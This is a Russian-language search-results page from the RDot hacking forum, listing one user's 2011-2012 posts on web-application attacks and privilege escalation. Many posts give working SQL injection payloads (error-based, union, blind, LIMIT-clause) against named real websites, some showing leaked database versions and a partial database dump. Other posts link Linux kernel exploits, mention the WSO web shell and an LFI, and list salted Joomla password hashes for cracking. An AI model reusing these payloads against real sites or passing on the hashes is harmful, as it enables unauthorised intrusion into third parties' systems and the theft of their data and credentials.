Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 48.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: Tigger
Раздел: Повышение привилегий/Privilege escalation 30.05.2012, 23:19
Ответов: 7
Просмотров: 7,354
Автор Tigger
В WSO встроенн бэк на Perl'e, если нету Perl'a,...

В WSO встроенн бэк на Perl'e, если нету Perl'a, то очевидно что такой бэк работать не будет. В таких случаях используй бэкконекты на других ЯП (С например).

На какие порты ты обычно пытаешься...
Раздел: Повышение привилегий/Privilege escalation 30.05.2012, 20:38
Ответов: 7
Просмотров: 7,354
Автор Tigger
Ядро 2011г, какой нафиг Enlightenment!?

Ядро 2011г, какой нафиг Enlightenment!?
Раздел: Web-среда/Web-applications 27.05.2012, 15:47
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
http://reborn.ru/123'and(1)=(select*from(select(na...

http://reborn.ru/123'and(1)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1
mysql error: Duplicate column name '5.0.32-Debian_7etch1-log'
Раздел: Повышение привилегий/Privilege escalation 25.05.2012, 18:38
Ответов: 1,219
Просмотров: 841,517
Автор Tigger
Pirotexnik Glibc Так же посмотри...

Pirotexnik

Glibc


Так же посмотри наличие прав на write на файлы\директории, которые прописаны в /etc/crontab
Раздел: Релизы/Releases 20.05.2012, 18:33
Ответов: 43
Просмотров: 125,960
Автор Tigger
Снова bing намудрил с версткой и сканер перестал...

Снова bing намудрил с версткой и сканер перестал работать.

Чинится так:
Файл: classes/class.CBingReverseIP.php


const PREG_BLOCK_OF_RESULT = '#<div id="results">(.*)</html>#is';
const...
Раздел: Повышение привилегий/Privilege escalation 17.05.2012, 16:57
Ответов: 1,219
Просмотров: 841,517
Автор Tigger
Pirotexnik Не пробьешь. P.S.: :fpalm: ...

Pirotexnik
Не пробьешь.

P.S.:
:fpalm:



Как бы директории lib в /lib нету, а ты именно ее и пытаешься сделать листинг =\
ls -la /lib/lib*
Раздел: Web-среда/Web-applications 06.05.2012, 20:21
Ответов: 21
Просмотров: 20,049
Автор Tigger
Следовать PoC основан на том, что не надо...

Следовать PoC основан на том, что не надо скармливать сторонний php.ini.
Раздел: Оффтоп/Offtopic 06.05.2012, 01:22
Ответов: 524
Просмотров: 199,365
Автор Tigger
Пашкела читер!!11 Не играйте с ним =( ...

Пашкела читер!!11
Не играйте с ним =(
http://gyazo.com/e2299bf20f7c0121669d4da10e685bbd.png
Раздел: Web-среда/Web-applications 04.05.2012, 14:33
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
И зачем такая конструкция запроса? o0 ...

И зачем такая конструкция запроса? o0

http://www.itspot.ru/index.php?id=146+and+1=2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+...
Раздел: Web-среда/Web-applications 26.04.2012, 01:03
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
С чего ты взял, что там вообще есть доступ к БД...

С чего ты взял, что там вообще есть доступ к БД mysql? Его нету.
Поэтому и не выдернуть значения file_priv.
Раздел: Web-среда/Web-applications 25.04.2012, 21:18
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
Тут блайнд PostgreSQL. Запросы такого типа: ...

Тут блайнд PostgreSQL.

Запросы такого типа:
...&stuff5=1336) [Payload] AND (123=123&...
&stuff5=1336)+AND+ASCII(SUBSTR(CURRENT_USER::text,1,1))=112+AND+(123=123&... - TRUE...
Раздел: Web-среда/Web-applications 22.04.2012, 18:30
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
Через rand() все крутиться.:

Через rand() все крутиться.:
Раздел: Web-среда/Web-applications 09.04.2012, 07:31
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
По поводу первого: ...

По поводу первого:
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=4) - FALSE
http://www.dmitrovlib.ru/part/index.php?id=(28)and(substring(version(),1,1)=5) - TRUE...
Раздел: Web-среда/Web-applications 07.04.2012, 15:26
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
Error-Based. ...

Error-Based.
http://www.bonide.com/products/category.php?category_id=1'or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+'1

Invalid query: Duplicate entry '5.0.771' for key 1
Раздел: Повышение привилегий/Privilege escalation 07.04.2012, 04:29
Ответов: 1,219
Просмотров: 841,517
Автор Tigger
intersecure3207 Нет

intersecure3207
Нет
Раздел: Web-среда/Web-applications 28.03.2012, 15:13
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
cat1vo ...

cat1vo

http://www.klad.com.ua/products.php?id=-27+UnIon(selECt(1),2,3,4,5,6,7,8,9,10,11,version())--+

Там еще и LFI, третья колонка.
...
Раздел: Web-среда/Web-applications 28.03.2012, 13:52
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
Там Oracle. И судя по всему Blind: ...

Там Oracle.
И судя по всему Blind:
http://www.tvk[stopgoogle]ultura.ru/forum.html?FID=81&FThrID=132749870227)+and+rownum=rownum+and+(123=123

Вот сдампил БД немного:

ADM
APOLOGIA
BABIES...
Раздел: Web-среда/Web-applications 24.03.2012, 00:01
Ответов: 17
Просмотров: 13,400
Автор Tigger
В любом HTTP-заголовке может быть SQL-inject. ...

В любом HTTP-заголовке может быть SQL-inject.
Часто встречаются INSERT + Referer\User-Agent\URI\etc, или я не так понял вопроса?
Раздел: Web-среда/Web-applications 23.03.2012, 23:55
Ответов: 3,618
Просмотров: 2,517,640
Автор Tigger
http://www.vine.az/news.php?page=2,1--%20a - TRUE...

http://www.vine.az/news.php?page=2,1--%20a - TRUE
http://www.vine.az/news.php?page=2,0--%20a - FALSE

Инъекция в LIMIT'e. И судя по всему там есть ORDER BY перед LIMIT'ом, т.ч. только если...
Раздел: Криптография/Cryptography 19.03.2012, 14:03
Ответов: 482
Просмотров: 330,573
Автор Tigger
Joomla ...

Joomla


e933973168b8a8105056cafba1d44488:3FDugBnuo5D0QWy0JZqGspWvvb1ooau4
e84a08d3285333463595ff705f232c97:a6STuCQhLId76DuzwXcS8o1CR1N18zgK...
Раздел: Повышение привилегий/Privilege escalation 16.12.2011, 01:08
Ответов: 13
Просмотров: 12,237
Автор Tigger
dumb А ты уверен, что на директорию /var/ftp...

dumb
А ты уверен, что на директорию /var/ftp установлены права 777 ?
Если нет, то ничего удивительного. Сделай ls -la /var/ftp.

P.S.:
Тестил на виртуалке, прочмодив зарание директорию, все...
Раздел: Оффтоп/Offtopic 08.12.2011, 21:36
Ответов: 18
Просмотров: 9,667
Автор Tigger
Поздравляю ;) Всего наилучшего.

Поздравляю ;)
Всего наилучшего.
Раздел: Повышение привилегий/Privilege escalation 23.11.2011, 15:19
Ответов: 1,219
Просмотров: 841,517
Автор Tigger
azid RDS -...

azid
RDS - http://www.vsecurity.com/download/tools/linux-rds-exploit.c

И в каком смысле результата ноль? Что выводили сплоеты?



Он же написал что пробовал ia32syscall, это и есть роберт.
Раздел: Целевые системы/Target systems 12.11.2011, 10:36
Ответов: 6
Просмотров: 6,669
Автор Tigger
https://forum.zloy.bz/showthread.php?p=4717424 ...

https://forum.zloy.bz/showthread.php?p=4717424
Я пользовался вот этим вот diff'ом.
Выкачивай версию, для которых написан этот патч ("патч для версий от 4.4 -4.7"). Потом открой файл version.h и там...
Раздел: Повышение привилегий/Privilege escalation 21.10.2011, 02:38
Ответов: 66
Просмотров: 52,517
Автор Tigger
_ttp://www.sendspace.com/file/0dpg9n Сплоит из...

_ttp://www.sendspace.com/file/0dpg9n
Сплоит из первого поста.
Показано с 1 по 25 из 48.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot